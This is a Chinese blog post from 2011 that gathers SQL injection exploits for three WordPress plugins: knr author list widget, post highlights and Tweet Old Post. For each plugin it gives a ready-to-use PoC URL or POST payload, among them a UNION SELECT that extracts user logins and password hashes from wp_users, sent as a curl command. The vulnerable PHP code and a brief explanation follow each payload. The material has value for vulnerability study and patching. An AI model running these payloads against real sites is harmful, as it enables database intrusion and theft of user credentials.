最近的 WordPress 插件漏洞整理

# WordPress 的 List Widget 插件在低于 2.0.0 版本中存在 SQL 注入漏洞
# 测试版本: 2.0.0

--- PoC ---
http://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

--------------- 存在漏洞的代码 ---------------
foreach ($_GET['listItem'] as $position => $item) :
    $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
    $wpdb->query($iterSql);
endforeach;

说明: $position 和 $item 都直接来自 $_GET，未经整数转换（如 intval()）或 $wpdb->prepare() 处理就拼入 SQL，这是注入点所在。

# WordPress 的 post highlights 插件在低于 2.2 版本中存在 SQL 注入漏洞
# 测试版本: 2.2
# 备注: magic_quotes 已经被关闭

--- PoC ---
http://localhost/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1'' OR 1=1--%20

--------------- 存在漏洞的代码 ---------------
$id = $_GET["id"];
...
$query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type='attachment' AND post_parent='$id'";

说明: $id 未经转义或 $wpdb->prepare() 处理即放入单引号字符串中；备注中提到 magic_quotes 关闭，正是因为开启时引号会被自动转义。

# WordPress 的 Tweet Old Post 插件在低于 3.2.5 版本中存在 SQL 注入漏洞
# 测试版本: 3.2.5

--------------- PoC (POST 数据) ---------------
URL: http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
POST 数据:
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1

例如:
curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1" http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

说明: 该页面位于 wp-admin 下，PoC 中的 --cookie 表明需要已登录的会话。

--------------- 存在漏洞的代码 ---------------
70 if(isset($_POST["setFilter"]))
71 {
72     if($_POST["cat"] != 0)
73     {
74         $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM ".$wpdb->prefix."term_relationships AS tr INNER JOIN ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" . $_POST["cat"] . ")";
75         $cat_filter = $_POST["cat"];

说明: 第 72 行的 != 0 比较不能阻止注入，第 74 行仍将 $_POST["cat"] 原样拼入 SQL；原文代码片段在第 75 行处截断。
posted @ 2011-09-08 09:20  Mr.Jim